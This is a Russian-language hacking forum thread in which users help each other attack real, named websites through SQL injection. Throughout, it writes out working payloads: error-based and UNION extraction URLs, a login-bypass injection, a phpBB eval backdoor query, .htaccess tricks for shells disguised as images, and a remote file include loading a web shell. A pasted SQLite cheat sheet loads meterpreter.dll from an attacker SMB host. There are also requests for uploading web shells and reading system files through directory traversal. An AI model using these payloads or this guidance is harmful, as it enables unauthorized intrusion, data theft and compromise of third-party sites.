с процентами с любыми не хочет работать

т.е. get-запрос

http://hostname/path/param1/(select%20'qwerty'))/param3/param4/

приводит к http-ошибке 500

квадратные скобки [] в GET-запросе браузер автоматически переделывает в %5B и %5D

и опять-же, запрос с процентами не "кушает" и выдаёт 500-ую ошибку

скачал себе с официального сайта ms-sql 2012 ( как у жертвы )

целый час качалось

теперь уже час устанавливается

буду тестировать оригинальные запросы типа

select%20'qwerty'

что-то мне подсказывает, что такие запросы не будут выполняться....

установил-таки MS-SQL 2012

запрос

select%20'qwerty'

вызвал ошибку

Сообщение 102, уровень 15, состояние 1, строка 1

Неправильный синтаксис около конструкции "20".

и все другие запросы с % в MSSQL 2012 тоже не работают:

select%01'qwerty'

select%02'qwerty'

select%03'qwerty'

select%04'qwerty'

...

select%20'qwerty'

запрос

select(table_name)from INFORMATION_SCHEMA.TABLES

в MSSQL 2012 отлично работает

но запросы

select(table_name)from (INFORMATION_SCHEMA.TABLES)

select(table_name)from(INFORMATION_SCHEMA.TABLES)

в MSSQL 2012 вызывают ошибку

Сообщение 102, уровень 15, состояние 1, строка 1

Неправильный синтаксис около конструкции ")".

Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.

Там кстати я ещё обновил информацию.

BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.



я уже заметил и тоже обновил свой ответ

спасибо за посильную помощь

BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.



у Вас (или у кого-нибудь ещё) есть возможность проверить - выполняется ли в оригинале на MS-SQL 2012 запрос вида

(select(varXXX)from(tableXXX))

т.е. вместо пробелов - скобки

?

BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.



это не WAF срабатывает

читайте мой пост выше

я его (тот пост) в очередной раз обновил....

aadktnbaov said:
запрос
select(table_name)from INFORMATION_SCHEMA.TABLES
в MSSQL 2012 отлично работает
но запросы
select(table_name)from (INFORMATION_SCHEMA.TABLES)
select(table_name)from(INFORMATION_SCHEMA.TABLES)
в MSSQL 2012 вызывают ошибку
Сообщение 102, уровень 15, состояние 1, строка 1
Неправильный синтаксис около конструкции ")".


А квадратные скобки пробовал?

BigBear said:
А квадратные скобки пробовал?


написал же

квадратные скобки [] в GET-запросе браузер автоматически переделывает в %5B и %5D

и опять-же, запрос с процентами не "кушает" и выдаёт 500-ую ошибку

P.S.

использовал браузеры IE , FireFox , Opera

можно еще Safari и Chrome установить ради такого дела, но что-то мне подсказывает, что они тоже будут скобки [] в GET-запросе автоматически переделывать в %5B и %5D

интересно, как не используя браузеры , т.е. програмно (Delphi) , отправить сайту get-запрос с квадратными скобками , а не %5B и %5D ?

и отработает ли он ?

P.P.S.

вчера в специально для таких целей установленной Microsoft SQL Server Management Studio "выдрочил" тысячи запросов

на моё удивление запрос

(select(table_name)from.information_schema.tables)

успешно отработал

( т.е. название таблицы information_schema.tables отделяем от from точкой )

но теперь никак не могу приделать к этой конструкции "where" , чтобы результат возвращал одну строку, а не столбец значений

у кого есть мысли по этому поводу ?

запрос

(select top(1)(table_name)from.information_schema.tables)

( между select и top находится пробел ) в моей Microsoft SQL Server Management Studio успешно выполняется

пока не придумал как убрать этот пробел между select и top

у кого есть мысли по этому поводу ?

Подскажите плиз как можно раскрутить скулу

вот есть сайт

http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету

а вот когда подставляю слеш \ то выскакивает вот такая ошибка

Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106

Можно ли её раскрутить?

Hapk said:
Подскажите плиз как можно раскрутить скулу
вот есть сайт
http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету
а вот когда подставляю слеш \ то выскакивает вот такая ошибка
Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106
Можно ли её раскрутить?


а на реальный url можно взглянуть? думаю тут вывод в error будет...

P.S: да думаю тут и бональным способом вывести можно.

если кавычка не слешируется то:

SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1' and 1=1#'

Hapk, прикольно. Скорее всего там либо режутся кавычки, либо экранируются.

т.к. запрос бы был таким:


SELECT url FROM air_redirect WHERE url_src =
'
/?cnt=articles&item=1
'
'


и ошибка была бы.

Попробуй следующее:

1 - потести на логику, как предложил winstrool

2 - error based

3 - если не получится - скинь линк в личку

winstrool said:
а на реальный url можно взглянуть? думаю тут вывод в error будет...
P.S: да думаю тут и бональным способом вывести можно.
если кавычка не слешируется то:
SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1'
and 1=1#'


Отправил юрл в личку

подскажите, как найти вход в базу данных MySQL >=5

chiper1 said:
подскажите, как найти вход в базу данных MySQL >=5


Попробуй по 3306 порту, может быть где-то в другом месте phpmyadmin.

с чего начать изучение xss атак?

Creator000 said:
с чего начать изучение xss атак?


с чтения статей

qaz said:
с чтения статей


киньте, пожалуйста, ссылки. а wtb-программирование ведь нало знать да?

Creator000 said:
киньте, пожалуйста, ссылки. а wtb-программирование ведь нало знать да?


google.com

Hapk said:
Подскажите плиз как можно раскрутить скулу
вот есть сайт
http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету
а вот когда подставляю слеш \ то выскакивает вот такая ошибка
Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106
Можно ли её раскрутить?



"раскрутили" ?

я знаю сайт с подобной "дырой"

( см. мой пост /showthread.php?p=3340983&posted=1#post3340983 )

ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?

ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?

Creator000 said:
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?


ставь локальный сервер и тесть сколько влезет


Creator000 said:
Интересно, с помощью xss можно в текст вставить картинку?


можно сделать все что умеет JS

ставь локальный сервер и тесть сколько влезет


а чат где мне взять?

Creator000 said:
а чат где мне взять?


скачать денвер и усановить на комп

Creator000 said:
а чат где мне взять?


все там же -> google.com

http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent='

чёт немогу скулю разкрутиь((

OxoTnik said:

HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+Group+by+11


HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1%20AND%20%28SELECT%205534%20FROM% 28SELECT%20COUNT%28*%29,CONCAT%280x3a666f733a,%28S ELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS% 20CHAR%29,0x20%29%29,1,50%29%20FROM%20INFORMATION_ SCHEMA.SCHEMATA%20LIMIT%201,1%29,0x3a7172693a,FLOO R%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHE MA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29

ppcompany_zu


Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.

А привести в читабельный вид слабо ?

З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.

BigBear said:
Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.
А привести в читабельный вид слабо ?
З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.


BigBear так пойдет?

http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+OR+(SELECT+COUNT(*)+FROM+(SELECT +1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT (MID((select+concat_ws(0x3a,user()),version(),data base())),1,63)+,+ FLOOR(RAND(0)*2)))#

P.S: У меня браузер как то сам в урленкод кидает когда, капирую с адресной строки...

Народ где взять чат на котором можно потестировать уязвимости?

Вообщем такой вопрос, залил картинку в аватары на форуме, мне нужен полный путь к аватару, а там так


/forum/image.php?u=3138&dateline=135229


а как получить полную ссылку?

Microsoft SQL Server

2008 (SP2) - 10.0.4000.0 (Intel X86)

Sep 16 2010 20:09:22 Copyright (c)

1988-2008 Microsoft Corporation

Enterprise Edition on Windows NT 6.0 (Build 6002: Service Pack 2)

(VM)

как выполнять команды в Microsoft SQL Server 2008 через mssql inj? например x p _ c m d s h e l l , какой должен стоять префикс вместо хp?

немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету

вроде где-то в таблице wp_usermeta

blesse said:
немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету


Таблица wp_users, поле user_status

Вроде как так.

User status че там? у всех нули..usermeta догадываюсь ,но не смог разобраться.вобщем вопрос-актуален

blesse said:
немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету


wp_users -> user_level

Уровень админа = 10 (на старой версии, на новой пока нет Интернета проверить =/ )

Совет

Есть скуля, бд из под рута, виндовый сервак, стоит XAMPP, файловые привилеги есть, папки на запись нет, в phpinfo временного файла нет, magic_quotes ON, phpmyadmin нет, админка из локалки, рдп есть. Пробовал хэши вытащить, из repair не подходит...

Нужен шелл, есть идеи?

Похожая проблема

Есть скуль) права рут, file_priv Y, Сервак на винде ISS

Есть папка на запись, phpmyadmin нету = \ удаленно не подконектишся к бд

Проблема в magic_quotes ON

Есть варианты как залить? : )

На оба вопроса ответ - Да, но при наличии внутреннего запроса. (метод Scipio)

BigBear said:
На оба вопроса ответ - Да, но при наличии внутреннего запроса. (метод Scipio)


У него не метод, а вероятная возможность. Условие очень жесткое, что бы результат запроса в базу, в котором есть уязвимость, участвовал в другом запросе. На практике такое встречается не так часто как хотелось бы.

BigBear said:
wp_users -> user_level
Уровень админа = 10 (на старой версии, на новой пока нет Интернета проверить =/ )


К сожалению у меня версия 3.3.1 там колонки юсерлевл нету

to GroM88

Нашел пост Scipio /showpost.php?p=663815&postcount=39 попробуй. Мне, к сожалению, не подходит...

можно что-то сделать с инъекцией в лимит?

К примеру, типа этого

www.e-tobaccos.com/buy-cigars/advanced_search_result.php?amp;currency=USD&language=en&manufacturers_id=20&operator=or&sort=@@D4d

есть Блинд инъекция, но сайт банит за частые попытки подключения. Вообщем как можно слить БД еще?) найти лог и пасс от чего то и залить шел? или что моно сделать?

Сори но я нуп в этом пока что. заранее спасибо

Кто подскажет как сделать картинку-шелл, т.е foto.jpg/.php

думаю вы поняли про какой баг я имею ввиду, просто так если тупо код шелла втыкивать в картинку, то картинка перестаёт работать

seozone said:
Кто подскажет как сделать картинку-шелл, т.е foto.jpg/.php
думаю вы поняли про какой баг я имею ввиду, просто так если тупо код шелла втыкивать в картинку, то картинка перестаёт работать


пробуй так


PHP:
AddType application/x-httpd-php.jpg

AddHandler application/x-httpd-php.jpg

или так


PHP:


AddType application/x-httpd-php.jpg

/?id=%40%40g3YlL&strana=content как правильно вывести базу данных??sql map ниче не выводит.mysql сервер

Vankoo said:
есть Блинд инъекция, но сайт банит за частые попытки подключения. Вообщем как можно слить БД еще?) найти лог и пасс от чего то и залить шел? или что моно сделать?
Сори но я нуп в этом пока что. заранее спасибо


Увеличить таймаут между запросами.

З.Ы. На глупые вопросы - глупые ответы.

З.Ы.Ы. Всё зависит от ситуации и куууууучи факторов.

winstrool said:
пробуй так

PHP:
AddType application/x-httpd-php.jpg

AddHandler application/x-httpd-php.jpg

или так

PHP:


AddType application/x-httpd-php.jpg





нет, вот сама бага

http://habrahabr.ru/post/100961/

помогите, тут есть инъекция


Code:
http://sdelanounas.ru/blogs/all/?page=-1

если есть то как раскрутить

+ ещё


Code:
http://sdelanounas.ru/blogs/21928/?pid=-185629

MorganFr said:
помогите, тут есть инъекция

Code:
http://sdelanounas.ru/blogs/all/?page=-1

если есть то как раскрутить


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8

Тут инъекция в LIMIT

C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.

BigBear said:
Тут инъекция в LIMIT


Там нет инъекции.

BigBear said:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8
Тут инъекция в LIMIT
C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.


Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?


Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:


Code:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1

Пробовал в Haviji POST запросом, ничего не вышло.

MorganFr said:
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?

Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:


Подозреваю что тут инъекция точно присутствует.

Во всяком случае при использовании ' or 1='1 сервер не ругался.

Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт

З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".

Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?

Cennarios said:
Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?


`web-blog`.wp_users

MorganFr said:
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?

Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:

Code:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1

Пробовал в Haviji POST запросом, ничего не вышло.




BigBear said:
Подозреваю что тут инъекция точно присутствует.
Во всяком случае при использовании ' or 1='1 сервер не ругался.
Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт
З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".


не получилось у меня в ручную ничего сделать, знаний не хватает. Может кто поможет, мне даже не важен хеш админа, но очень нужно раскрытие полного пути к скрипту.

MorganFr said:
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?

Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:

Code:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1

Пробовал в Haviji POST запросом, ничего не вышло.


login=' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#

password=1

Duplicate entry '5.0.51a-24+lenny5-log' for key 1

m.gortransperm.ru/time-table/12+order+by+1/13403 pgsql , order by 1 с ошибкой?!

Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,3,4,5,6,7,8,9,10,11+--

Логинов/паролей нету, как и самой админки


Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,File_Priv,4,5,6,7,8,9,10,11+f rom+mysql.user--

Это понимать как то что нету привилегий, или как то что что-то не так? Можно ли шелл залить?

Fooog said:

Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,3,4,5,6,7,8,9,10,11+--

Логинов/паролей нету, как и самой админки

Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,File_Priv,4,5,6,7,8,9,10,11+f rom+mysql.user--

Это понимать как то что нету привилегий, или как то что что-то не так? Можно ли шелл залить?


Во первых, у вас нет ни файловых привилегий, ни доступа к mysql.user, с чего вы вообще решили возможность в таком случае файловых привилегий?!

Во вторых, в бд ничего нет похожего связаного с доступом к админке


_ttp://testrrrrrrru-online.ru/?video=%27-989%27+union+select+1,2,%28select%28@x%29from%28se lect%28@x:=0x00%29,%28select%280%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,4,5,6,7,8 ,9,10,11+--+

http://site.ru/index.php?http://myserver.ru/sys12.txt

вижу свой шелл всо2, авторизируюсь - вижу листинг директорий

при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла

вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:

пытаюсть залиться туда wgetом - результата нет

пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(

сервак поидее можно порутать, FreeBSD 3.3-RELEASE

vaddd said:
http://site.ru/index.php?http://myserver.ru/sys12.txt
вижу свой шелл всо2, авторизируюсь - вижу листинг директорий
при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла
вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:
пытаюсть залиться туда wgetом - результата нет
пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(
сервак поидее можно порутать, FreeBSD 3.3-RELEASE


Попробуй залить шелл без пасса...

попробуй убери из кода шелла саму авторизацию,бывает помагает

в каких шеллах можно отключить авторизацию поменяв значение переменной по типу

auth_enabled=false;?

vaddd said:
в каких шеллах можно отключить авторизацию поменяв значение переменной по типу
auth_enabled=false;?


попробуй этот

http://pastebin.com/c35GqLPx

Как можно использовать эту ошибку?


Warning: pg_query(): Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^ in /srv/www/htdocs/!sites/index.php on line 246 Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^

vaddd said:
http://site.ru/index.php?http://myserver.ru/sys12.txt
вижу свой шелл всо2, авторизируюсь - вижу листинг директорий
при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла
вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:
пытаюсть залиться туда wgetом - результата нет
пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(
сервак поидее можно порутать, FreeBSD 3.3-RELEASE


+ поставь действие по умолчанию в шелле - консолька, и через неё совершай действия.


Как можно использовать эту ошибку?
Цитата:
Warning: pg_query(): Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^ in /srv/www/htdocs/!sites/index.php on line 246 Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^


Минимум - раскрытие путей, максимум - возможная инъекция в LIMIT 1,[inject]. Но надо смотреть.

Помогите.

выполнил sql запрос как написано тут /showpost.php?p=2064084&postcount=25

Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь

M1ks said:
Помогите.
выполнил sql запрос как написано тут /showpost.php?p=2064084&postcount=25
Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь


ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.

smirk said:
ну как залить шелл там пример есть, а путь узнаешь сделав запрос echo realpath("."); ну или в phpinfo посмотреть.


а можно узнать где такой запрос сделать? майскул уже научилась выполнять пхп скрипты?

qaz said:
а можно узнать где такой запрос сделать? майскул уже научилась выполнять пхп скрипты?


ну если б вы внимательно читали пост M1ks, то не задавали бы такой "умный" вопрос.

Он написал, что сделал sql запрос


UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;


из этого поста /showpost.php?p=2064084&postcount=25

Теперь ему надо залить шелл, а путь не знает


M1ks said:
Теперь хочу узнать путь, куда залить шелл, помогите с php запросом, чтоб выполнил ls или просто узнать путь


по скольку он сделал этот sql запрос, можно узнать путь: profile.php?mode=editprofile&c=echo realpath("."); или вывести инфу пхп mode=editprofile&c=phpinfo(); и там смотреть путь.

доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать

nijat11 said:
доброго времени суток товарищи. скажите пожалуйста есть ли тут инъекция http://www.swtravel.az/index.php?ind=newsfull&id=118' если да то направьте на правильном пути , а то я не смог количество колонок подобрать


http://www.swtravel.az/index.php?stype=a&slevel=1&sid=-11%20union%20select%20@@version,2,3--

инъекция в SQLite. Обычная UNION-based.

Никогда с ними не сталкивался. Таблы вытянул из sqlite_master. Как вытянуть колонки?

Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION()

Но не совсем понял, как он работает. Дайте доков по сабжу.

Pirotexnik said:
инъекция в SQLite. Обычная UNION-based.
Никогда с ними не сталкивался. Таблы вытянул из
sqlite_master
. Как вытянуть
колонки
?
Читал про какуй-то альтернативный метод залития шелла. LOAD_EXTENSION()
Но не совсем понял, как он работает. Дайте доков по сабжу.


2 способа получения шелла на SQLite

Getting Shell Trick 1 - ATTACH DATABASE

What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example:

?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;--

Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer.

Теперь по-русски. Приведённый запрос пытается подключить дополнительную БД ( указанную в файле /var/www/lol.php ) в твой запрос к БД. Если этот файл отсутствует, он автоматически создастся - то, что нам и надо.

Зависимости:

MQ=off

Full_path_disclosure=1

Getting Shell Trick 2 - SELECT load_extension

Takes two arguments:

A library (.dll for Windows, .so for NIX)

An entry point (SQLITE_EXTENSION_INIT1 by default)

This is great because

This technique doesn't require stacked queries

The obvious - you can load a DLL right off the bat (meterpreter.dll?

Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example:

?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter .dll','DllMain');--

В этом примере используется Samba протокол для доступа к хосту злоумышленника, где в качестве плагина для SQLite скачаивает "ядовитую" начинку. Тут нужно обратить внимание с какой ОС Вы имеете дело - либо Windows (тогда расширение у файла должно быть .dll ), либо Unix (расширение .so соответственно).

Proof = _ttps://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet

Добрый день, помогите новичку

Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал.

Спасибо

zloy_fantom said:
Добрый день, помогите новичку
Нашел directory traversal на сайте, прочитал файл /etc/passwd, (пароли в /etc/shadow не прочитал), нашел httpd.conf, посмотрел реврайт рулы, список виртуальных хостов и всякие другие дефолтные файлы. Прочитал /bin/sh, а вот как его запустить на выполнение? Или хотя-бы как-то посмотреть дерево каталогов и файлов. Короче, уткнулся в то, что не могу /bin/sh запустить на выполнение, но подозреваю, что это можно сделать, ведь его содержимое я прочитал.
Спасибо


Если у тебя права только на чтение файлов, то единственное что ты можешь делать - читать файлы